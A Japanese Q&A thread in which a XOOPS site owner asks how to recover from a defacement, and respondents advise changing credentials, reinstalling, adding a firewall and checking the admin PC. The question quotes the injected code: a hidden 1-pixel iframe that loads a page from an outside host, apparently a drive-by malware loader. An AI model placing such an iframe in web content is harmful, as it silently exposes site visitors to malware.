サイト改ざんにあい困っております。以下のようなスクリプトを100カ所以上書き込まれておりxoopsサイトがエラー表示です。内容はDB接続が不能の表示で、DB(apache)を再起動しても駄目です。何かよい対処法はありませんでしょうか?
<iframe width="1px" height="1px" src="http://ishigo.sytes.ne
t/openstat/appropriate/promise-ourselves.php" style="display
:block;" >
No.1
797
122
100pt
管理者ログイン名、パスワードを変更してください。
あと、Apacheのセキュリティ設定も見直してください。
http://www.atmarkit.co.jp/ait/articles/0508/02/news102.html
687
674
1
1
コメント(4件)
http://q.hatena.ne.jp/1368020492
この時、改ざんされたファイルの確認はどのように行ったのでしょう?
テーマファイル(※「themes」内にあります。)が変更されていないか確認してみてください。
※一応すべてのファイルをデフォルトのファイルで上書きした方がいいと思います。
※ウェブサーバー(Apache)とデータベースサーバー(おそらくMySQL?)を再起動しても動作しないという事ですか?
専用サーバーなのでしょうか?
サーバーの管理知識がまだまだ不足している状態なのだと思います。
クリーンインストールし直した方がいいのではないでしょうか・・・
※おそらくLinuxだと思いますが、コンピュータ自体にファイアウォールを構築していますか?
必ず必要ですので、サイトや本を参考にしながら設定してみてください。
サーバーの勉強期間は、外国からのアクセスをすべて制限して置いた方がいいと思います。
目視です、あきらかにわかるような記述です。
>テーマファイル(※「themes」内にあります。)が変更されていないか確認してみてください。
テーマファイルは変更されてませんでした。
>※一応すべてのファイルをデフォルトのファイルで上書きした方がいいと思います。
実施しました。
>※ウェブサーバー(Apache)とデータベースサーバー(おそらくMySQL?)を再起動しても動作しないという事ですか?
これが困ったところで、mysqlを再起動したりマシンごと再起動しても駄目です。しかしmysqlは動作しているようです。
>専用サーバーなのでしょうか?
さくらVPSです。
>サーバーの管理知識がまだまだ不足している状態なのだと思います。
はい、設置もSOHOに依頼分です。
>クリーンインストールし直した方がいいのではないでしょうか・・・
そのようですね( ̄Д ̄;;
>※おそらくLinuxだと思いますが、コンピュータ自体にファイアウォールを構築していますか?
SOHOに依頼です。
>必ず必要ですので、サイトや本を参考にしながら設定してみてください。
>サーバーの勉強期間は、外国からのアクセスをすべて制限して置いた方がいいと思いま
マルウェア等への感染があった場合の対応がどうなっているか契約内容を確認して、もし可能なら再インストールを依頼した方がいいと思います。
※潮澤 昴さんがコメントしていますが、依頼前にサイトの管理に使用していたPCの感染も調べた方がいいです。
・サイバークリーンセンター
https://www.ccc.go.jp/
・国内外におけるWebサーバ(Apache)の不正モジュールを使った改ざん被害
http://blog.trendmicro.co.jp/archives/6888